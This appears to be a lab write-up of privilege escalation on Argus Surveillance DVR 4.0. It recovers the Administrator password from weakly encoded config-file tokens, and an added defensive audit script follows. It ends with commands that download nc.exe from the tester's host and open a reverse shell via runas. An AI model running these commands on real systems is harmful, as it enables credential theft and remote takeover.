Priv Escalation

After going through the multiple exploits the application appeared to be vulnerable to, I was not able to write to the locations those exploits required.

With this exploit I was able to read the password hash of the Administrator user, because the DVRParams.ini configuration file is readable by a low-privileged user.

type "C:\ProgramData\PY_Software\Argus Surveillance DVR\DVRParams.ini"
[Main]
ServerName=
ServerLocation=
ServerDescription=
ReadH=0
UseDialUp=0
DialUpConName=
DialUpDisconnectWhenDone=0
DialUpUseDefaults=1
DialUpUserName=
DialUpPassword=
DialUpDomain=
DialUpPhone=
ConnectCameraAtStartup=1
ConnectSessionFile=Argus Surveillance DVR.DVRSes
StartAsService=1
RunPreviewAtStartup=1
FullScreenAtStartup=0
GalleryFolder=C:\ProgramData\PY_Software\Argus Surveillance DVR\Gallery\
RecordEncryptionPassword=
RecordFrameInterval=200
RecordMaxFileSize=0
RecordEncryption=0
RecordAllTime=0
RecordSound=1
RecordMotion=1
RecordCamName=1
RecordCamLocation=1
RecordCamDescript=1
HTTP_AlwaysActive=1
HTTP_Port=8080
HTTP_Interval=100
HTTP_LimitViewers=0
HTTP_NeedAuthorization=0
HTTP_NeedLocalAuthorization=0
HTTP_MaxNumberOfViewers=100
HTTP_AudioEnabled=1
HTTP_StreamEnabled=1
HTTP_EncriptionType=0
HTTP_VideoBitRate=204800
HTTP_DisconnectInactiveUsers=0
HTTP_MaxInactivityTime=0
HTTP_MaxConnectionMinutes=0
HTTP_ReconnectAgain=0
WriteHTTPLog=1
WriteMotionLog=1
WriteEventsLog=1
LimitMaxSizeOfLogFile=1
MaxSizeOfLogFile=10000
UseRedirect=1
UseWebMonitoring=0
PYSoftAccountEmail=
PYSoftAccountPsw=
AskLoginAtStartup=0
TaskTrayPassword=
StealthMode=0
AskForConfirmationOnExit=0
Watchdog_PollingIntrvl=20
Watchdog_RestartProgramPolls=20
Watchdog_Reboot=0
Watchdog_RebootTries=20
Watchdog_RebootPeriodically=1
Watchdog_RebootPeriodclType=1
Watchdog_RebootInterval=1
Watchdog_Hours=24
Watchdog_Days=1
Watchdog_DayOfWeek=0
Watchdog_Month=1
Watchdog_RebootIfCPU=0
Watchdog_RebootIfCPUType=0
Watchdog_CPU=98
Watchdog_RebootIfCPUPolls=20
Watchdog_IsRemoteAccess=0
Watchdog_AccessPort=10000
Watchdog_AccessID=
Watchdog_AccessPsw=
DynIPNextConnectTime0=0
DynIPNextConnectTime1=0
MonitorNextConnectTime0=0
MonitorNextConnectTime1=0
SMSNextConnectTime0=0
SMSNextConnectTime1=0
UseScreenSaver=0
ScreenSaveTimeOut=5
MaxFileSize=2048
StreamToWeb=0
WebPageBackColor=16767949
WebPageTextColor=0
WebPageLinkColor=0
WebPageActiveLnkColor=0
WebPageVisitedLnkColor=0
WebPageActiveXColor=0
PreviewByOCX=1
ReduceCPUUsage=1
MaximumCPUUsage=95
ActionsAllTime=0
DetectMotion=0
DetectionInterval=500
MotionDetectionDelay=1000
DifferencesThreshold=5
MotionDifSensitivity=0
MotionDontTriggerIfMuch=0
MotionDontTriggerTrshld=90
MotionSensitivityCnst=90
MotionSensitivity1=30
MotionSensitivity2=21
MotionSensitivity3=17
MotionSensitivity4=15
MotionSensitivity5=15
MotionSensitivity6=17
MotionSensitivity7=21
MotionSensitivity8=30
MotionMinActionDuration=2000
MotionSendEmail=0
EmailUsePysoftMailServer=0
MotionEmailServer=
MotionEmailNeedPassword=0
MotionEmailAccountName=
MotionEmailPassword=
MotionEmailSMTPPort=25
MotionEmailSender=
MotionEmailAddress=
MotionEmailSubject=4D6F74696F6E207B4D4F54494F4E7D2520686173206265656E206465746563746564212121
MotionEmailMessage=43616D65726120237B43414D4552417D206174207B68683A6E6E3A73737D20686173206465746563746564207B4D4F54494F4E7D25206D6F74696F6E20696E20746865207761746368656420617265612E
MotionEmailInterval=20
MotionEmailAttachImage=1
MotionEmailNumberOfImages=3
MotionEmailPriority=1
FacesDetect=0
FacesHighlight=1
FaceDetectSensitivityInPercents=50
FaceDetecMinFaceInPercents=10
MotionPlaySound=0
MotionSoundFile=
MotionLanchApplication=0
MotionApplicationFile=
MotionRecordVideo=0
MotionVideoDuration=120
MotionPreVideoDuration=2
MotionWriteSnapshots=0
MotionSnapshotDuration=10
MotionChangeSettings=0
MotionImageQuality=70
MotionSoundQuality=70
MotionRecordInterval=133
MotionChangeSettingsDuration=10
MotionDrawMotionValue=0
MotionHighlightMoving=0
SendSMS=0
SMSSender=
SMSPhone=
SMSMessage=43616D65726120237B43414D4552417D206174207B68683A6E6E3A73737D20686173206465746563746564207B4D4F54494F4E7D25206D6F74696F6E20696E20746865207761746368656420617265612E
RemoveObsoleteFiles=1
DaysToDeleteObsoleteFiles=7
LastReadNetCamsListDay=44760

[Users]
LocalUsersCount=2
UserID0=434499
LoginName0=Administrator
FullName0=60CAAAFEC8753F7EE03B3B76C875EB607359F641D9BDD9BD8998AAFEEB60E03B7359E1D08998CA797359F641418D4D7BC875EB60C8759083E03BB740CA79C875EB603CD97359D9BDF6414D7BB740CA79F6419083
FullControl0=1
CanClose0=1
CanPlayback0=1
CanPTZ0=1
CanRecord0=1
CanConnect0=1
CanReceiveAlerts0=1
CanViewLogs0=1
CanViewCamerasNumber0=0
CannotBeRemoved0=1
MaxConnectionTimeInMins0=0
DailyTimeLimitInMins0=0
MonthlyTimeLimitInMins0=0
DailyTrafficLimitInKB0=0
MonthlyTrafficLimitInKB0=0
MaxStreams0=0
MaxViewers0=0
MaximumBitrateInKb0=0
AccessFromIPsOnly0=
AccessRestrictedForIPs0=
MaxBytesSent0=0
Password0=ECB453D16069F641E03BD9BD956BFE36BD8F3CD9D9A8
Description0=60CAAAFEC8753F7EE03B3B76C875EB607359F641D9BDD9BD8998AAFEEB60E03B7359E1D08998CA797359F641418D4D7BC875EB60C8759083E03BB740CA79C875EB603CD97359D9BDF6414D7BB740CA79F6419083
Disabled0=0
ExpirationDate0=0
Organization0=
OrganizationUnit0=
Phone10=
Phone20=
Fax0=
Email0=
Position0=
Address10=
Address20=
City0=
StateProvince0=
ZipPostalCode0=
Country0=
ComputerID0=
TrialAccount0=0
UserID1=576846
LoginName1=Viewer
FullName1=
FullControl1=1
CanClose1=1
CanPlayback1=1
CanPTZ1=1
CanRecord1=1
CanConnect1=1
CanReceiveAlerts1=1
CanViewLogs1=1
CanViewCamerasNumber1=0
CannotBeRemoved1=0
MaxConnectionTimeInMins1=0
DailyTimeLimitInMins1=0
MonthlyTimeLimitInMins1=0
DailyTrafficLimitInKB1=0
MonthlyTrafficLimitInKB1=0
MaxStreams1=0
MaxViewers1=0
MaximumBitrateInKb1=0
AccessFromIPsOnly1=
AccessRestrictedForIPs1=
MaxBytesSent1=0
Password1=5E534D7B6069F641E03BD9BD956BC875EB603CD9D8E1BD8FAAFE
Description1=
Disabled1=0
ExpirationDate1=0
Organization1=
OrganizationUnit1=
Phone11=
Phone21=
Fax1=
Email1=
Position1=
Address11=
Address21=
City1=
StateProvince1=
ZipPostalCode1=
Country1=
ComputerID1=
TrialAccount1=0

The hash of the Administrator user turned out to be:

"ECB453D16069F641E03BD9BD956BFE36BD8F3CD9D9A8"

I put that hash into the exploit script (the pass_hash variable below).

# ASCII art is important xD
banner = '''
#########################################
#    _____ Surveillance DVR 4.0         #
#   /  _  \_______  ____  __ __  ______ #
#  /  /_\  \_  __ \/ ___\|  |  \/  ___/ #
# /    |    \  | \/ /_/  >  |  /\___ \  #
# \____|__  /__|  \___  /|____//____  > #
#         \/     /_____/            \/  #
#        Weak Password Encryption       #
############ @deathflash1411 ############
'''
print(banner)

# Change this :)
pass_hash = "ECB453D16069F641E03BD9BD956BFE36BD8F3CD9D9A8"
if (len(pass_hash)%4) != 0:
	print("[!] Error, check your password hash")
	exit()
split = []
n = 4

I ran the exploit to decode the password.

python3 /usr/share/exploitdb/exploits/windows/local/50130.py

#########################################
#    _____ Surveillance DVR 4.0         #
#   /  _  \_______  ____  __ __  ______ #
#  /  /_\  \_  __ \/ ___\|  |  \/  ___/ #
# /    |    \  | \/ /_/  >  |  /\___ \  #
# \____|__  /__|  \___  /|____//____  > #
#         \/     /_____/            \/  #
#        Weak Password Encryption       #
############ @deathflash1411 ############

[+] ECB4:1
[+] 53D1:4
[+] 6069:W
[+] F641:a
[+] E03B:t
[+] D9BD:c
[+] 956B:h
[+] FE36:D
[+] BD8F:0
[+] 3CD9:g
[-] D9A8:Unknown

The password came out as 14WatchD0g, but the exploit could not decode the last character (D9A8). To find out which character it represented, we created a new account whose password contained several special characters and read the resulting tokens.

The results:

  • ! = B398

  • @ = 78A7

  • # = <blank> (This is probably why the first password didn't work)

  • $ = D9A8

D9A8 turned out to be the dollar sign, so the password was 14WatchD0g$. Unfortunately, I was unable to SSH with that password, so we must use runas to execute nc or a payload of our own.
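As an added audit example (not part of this write-up and not the exploit-db script), the following Python parses a [Users] section like the one dumped above, splits each stored password into the 4-hex-digit tokens the scheme uses, decodes it with only the token pairs recovered on this page, and reports the two properties that make this storage weak for anyone reviewing a DVR install: the same character always produces the same token regardless of position or user (the Viewer password shares the run "Watch" with the Administrator password), and identical plaintext in two fields produces byte-identical ciphertext (FullName0 and Description0), so there is no salt or IV. The token table and the sample INI are constructed from the values shown above; the key layout (letters followed by a user index) is an assumption taken from the dumped file, and keys such as Phone10 that end in a digit are not disambiguated.

```python
"""Added example: audit an Argus-style DVRParams.ini [Users] section.

Not part of the write-up or the exploit-db script. The token table holds
only the pairs recovered on this page; the field layout is assumed from
the file dumped above.
"""
import re
from itertools import combinations

# Token -> character pairs recovered in the write-up (exploit output plus the
# test account created with special characters). Anything else is unknown.
KNOWN_TOKENS = {
    "ECB4": "1", "53D1": "4", "6069": "W", "F641": "a", "E03B": "t",
    "D9BD": "c", "956B": "h", "FE36": "D", "BD8F": "0", "3CD9": "g",
    "D9A8": "$", "B398": "!", "78A7": "@",
}

# Constructed sample: [Users] trimmed to the fields that matter, with the
# values shown in the dump above (wrapped lines joined back together).
SAMPLE_INI = """[Users]
LocalUsersCount=2
LoginName0=Administrator
FullName0=60CAAAFEC8753F7EE03B3B76C875EB607359F641D9BDD9BD8998AAFEEB60E03B7359E1D08998CA797359F641418D4D7BC875EB60C8759083E03BB740CA79C875EB603CD97359D9BDF6414D7BB740CA79F6419083
Password0=ECB453D16069F641E03BD9BD956BFE36BD8F3CD9D9A8
Description0=60CAAAFEC8753F7EE03B3B76C875EB607359F641D9BDD9BD8998AAFEEB60E03B7359E1D08998CA797359F641418D4D7BC875EB60C8759083E03BB740CA79C875EB603CD97359D9BDF6414D7BB740CA79F6419083
LoginName1=Viewer
FullName1=
Password1=5E534D7B6069F641E03BD9BD956BC875EB603CD9D8E1BD8FAAFE
Description1=
"""

HEX_TOKENS_RE = re.compile(r"^(?:[0-9A-Fa-f]{4})+$")
# Assumed key shape: a field name followed by the user index (Password0).
# Keys such as Phone10 are ambiguous under this regex; the sample omits them.
USER_KEY_RE = re.compile(r"^([A-Za-z]+?)(\d+)=(.*)$")


def split_tokens(value):
    """Split a stored value into the 4-hex-digit units the scheme uses."""
    value = value.strip()
    if not HEX_TOKENS_RE.match(value):
        raise ValueError(f"not a run of 4-hex-digit tokens: {value!r}")
    return [value[i:i + 4].upper() for i in range(0, len(value), 4)]


def decode_tokens(tokens, table=KNOWN_TOKENS):
    """Map each token through the table; '?' marks a token not yet recovered."""
    return "".join(table.get(t, "?") for t in tokens)


def parse_users(ini_text):
    """Return {login: {field: value}} for every LoginName<N> entry."""
    by_index = {}
    for line in ini_text.splitlines():
        m = USER_KEY_RE.match(line)
        if m:
            key, idx, val = m.groups()
            by_index.setdefault(idx, {})[key] = val
    return {f["LoginName"]: f for f in by_index.values() if "LoginName" in f}


def longest_shared_run(a, b):
    """Longest common contiguous token run (standard DP). With a per-character
    substitution and no salt, a shared password substring shows up as an
    identical token run in both users' entries."""
    best_len, best_end, prev = 0, 0, [0] * (len(b) + 1)
    for i in range(1, len(a) + 1):
        cur = [0] * (len(b) + 1)
        for j in range(1, len(b) + 1):
            if a[i - 1] == b[j - 1]:
                cur[j] = prev[j - 1] + 1
                if cur[j] > best_len:
                    best_len, best_end = cur[j], i
        prev = cur
    return a[best_end - best_len:best_end]


def audit(ini_text):
    """Decode what the known table allows and flag the structural weaknesses."""
    users = parse_users(ini_text)
    report = {"users": {}, "shared_runs": [], "duplicate_values": []}
    pw_tokens = {}
    for login, fields in users.items():
        if not fields.get("Password"):
            continue  # account without a stored password: nothing to decode
        toks = split_tokens(fields["Password"])
        pw_tokens[login] = toks
        report["users"][login] = {
            "decoded": decode_tokens(toks),
            "unknown": sorted({t for t in toks if t not in KNOWN_TOKENS}),
        }
    for a, b in combinations(pw_tokens, 2):
        run = longest_shared_run(pw_tokens[a], pw_tokens[b])
        if len(run) >= 3:
            report["shared_runs"].append((a, b, decode_tokens(run)))
    # Equal plaintext in two fields gives byte-identical ciphertext: no salt/IV.
    seen = {}
    for login, fields in users.items():
        for key, val in fields.items():
            if len(val) >= 8 and HEX_TOKENS_RE.match(val):
                seen.setdefault(val, []).append((login, key))
    report["duplicate_values"] = [v for v in seen.values() if len(v) > 1]
    return report


if __name__ == "__main__":
    result = audit(SAMPLE_INI)
    for login, info in result["users"].items():
        print(f"{login}: {info['decoded']}  unknown tokens: {info['unknown']}")
    for a, b, shared in result["shared_runs"]:
        print(f"{a} and {b} share the run {shared!r}")
    for dup in result["duplicate_values"]:
        print(f"identical ciphertext in {dup}")
```

Run against a real DVRParams.ini, the "unknown" list tells a reviewer how much of a stored password is still opaque, while a non-empty shared_runs or duplicate_values list is enough on its own to classify the storage as reversible encoding rather than hashing, whatever the remaining tokens are.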

powershell.exe -c "iwr http://192.168.49.100:443/nc.exe -OutFile C:\Users\viewer\nc.exe"
runas /env /profile /user:DVR4\Administrator "C:\Users\viewer\nc.exe -e cmd.exe 192.168.49.100 443"
Enter the password for DVR4\Administrator: 
